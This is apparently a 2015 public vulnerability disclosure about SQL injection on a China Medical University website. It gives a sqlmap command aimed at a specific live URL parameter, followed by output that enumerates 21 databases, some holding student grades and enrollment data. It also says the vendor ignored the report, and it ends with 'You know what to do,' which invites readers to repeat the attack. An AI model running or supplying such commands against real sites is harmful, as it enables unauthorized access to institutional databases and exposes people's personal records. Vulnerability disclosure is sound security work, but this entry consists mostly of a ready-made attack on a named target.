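2015-09-18: Details reported to the vendor; awaiting vendor handling.
2015-09-23: The vendor chose to ignore the vulnerability; details disclosed to the public.
University Security: SQL Injection at China Medical University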
sqlmap.py -u "http://etc.cmu.edu.cn/ylx/lianxi_x.asp?zid=1" --dbs
available databases [21]:
[*] bbs
[*] chengji
[*] master
[*] model
[*] msdb
[*] pictest
[*] picture
[*] QandA
[*] tempdb
[*] test1
[*] yaolibbs
[*] yaolijp
[*] yx_baoming
[*] zjxt
[*] 备份
[*] 护理资源共享课
[*] 药学院_临床药学实验教学中心
[*] 药学院平台
[*] 药理学精品共享课
[*] 辽宁培训学院
[*] 辽宁继续教育学院

Database: msdb
[95 tables]
As above.
You know what to do.
Severity: No impact (ignored by vendor)
Ignored on: 2015-09-23 00:10
None yet.